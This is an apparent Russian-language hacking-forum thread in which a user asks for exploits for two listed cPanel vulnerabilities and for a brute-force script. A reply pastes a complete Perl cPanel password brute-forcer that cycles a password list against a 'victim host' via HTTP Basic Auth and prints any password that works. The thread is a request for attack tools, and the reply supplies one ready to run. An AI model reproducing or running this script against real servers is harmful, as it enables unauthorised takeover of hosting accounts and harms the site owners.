• XSS.stack #1 – первый литературный журнал от юзеров форума

Подскажите где найти..

kolllak

floppy-диск
Пользователь
Регистрация
15.03.2009
Сообщения
9
Реакции
0
Народ подскажите где можно найти эксплойты по след уязвимостям:
хttp://www.securitylab.ru/vulnerability/204471.php
хttp://www.securitylab.ru/vulnerability/203603.php

Может у кого есть что-нибудь актуальное (не приват)? Или скрипт брута какой неплохой, качнул от пельмешко (чет не идет, пока не разобрался) и cpanel brut (но в нем надо логин знать)....
подмогните у кого есть время...
 
Подбор паролей в cPanel от 25 октября, 2004.
По дате видно что бага не из новых. По этому идём в гоогл и ищем.

Что же мы нашли..
во 1 брутфорсер под цпанел

Код:
#!/usr/bin/perl 
# Cpanel Password Brute Forcer 
# ---------------------------- 
#    (c)oded By Hessam-x 
# Perl Version ( low speed ) 
# Oerginal Advisory : 
# http://www.simorgh-ev.com/advisory/2006/cpanel-bruteforce-vule/ 
use IO::Socket; 
use LWP::Simple; 
use MIME::Base64; 

$host     = $ARGV[0]; 
$user     = $ARGV[1]; 
$port     = $ARGV[2]; 
$list     = $ARGV[3]; 
$file     = $ARGV[4]; 
$url = "http://".$host.":".$port; 
if(@ARGV < 3){ 
print q( 
############################################################### 
#               Cpanel Password Brute Force Tool              # 
############################################################### 
#     usage : cpanel.pl [HOST] [User] [PORT][list] [File]    # 
#-------------------------------------------------------------# 
#    [Host] : victim Host             (simorgh-ev.com)        # 
#    [User] : User Name               (demo)                  # 
#    [PORT] : Port of Cpanel          (2082)                  # 
#[list] : File Of password list   (list.txt)              # 
#    [File] : file for save password  (password.txt)          # 
#                                                             # 
############################################################### 
#            (c)oded By Hessam-x / simorgh-ev.com             # 
############################################################### 
);exit;} 

headx(); 

$numstart  = "-1"; 

sub headx() { 
print q( 
############################################################### 
#              Cpanel Password Brute Force Tool               # 
#            (c)oded By Hessam-x / simorgh-ev.com             # 
############################################################### 
); 
open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !"; 
@PASSWORDS = <PASSFILE>; 
close PASSFILE; 
foreach my $P (@PASSWORDS) { 
chomp $P; 
$passwd = $P; 
print " 
[~] Try Password : $passwd 
"; 
&brut; 
}; 
} 
sub brut() { 
$authx = encode_base64($user.":".$passwd); 
print $authx; 
my $sock = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print " 
[-] Can not connect to the host"; 
print $sock "GET / HTTP/1.1 
"; 
print $sock "Authorization: Basic $authx 
"; 
print $sock "Connection: Close 

"; 
read  $sock, $answer, 128; 
close($sock); 

if ($answer =~ /Moved/) { 
print " 
[~] PASSWORD FOUND : $passwd 
"; 
exit(); 
} 
}

Но тут возникает вопрос использует ли этот брутфорсер данные уязвимости ? На верника сказать не могу так как инфу по данному брутфорсеру не нашёл.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх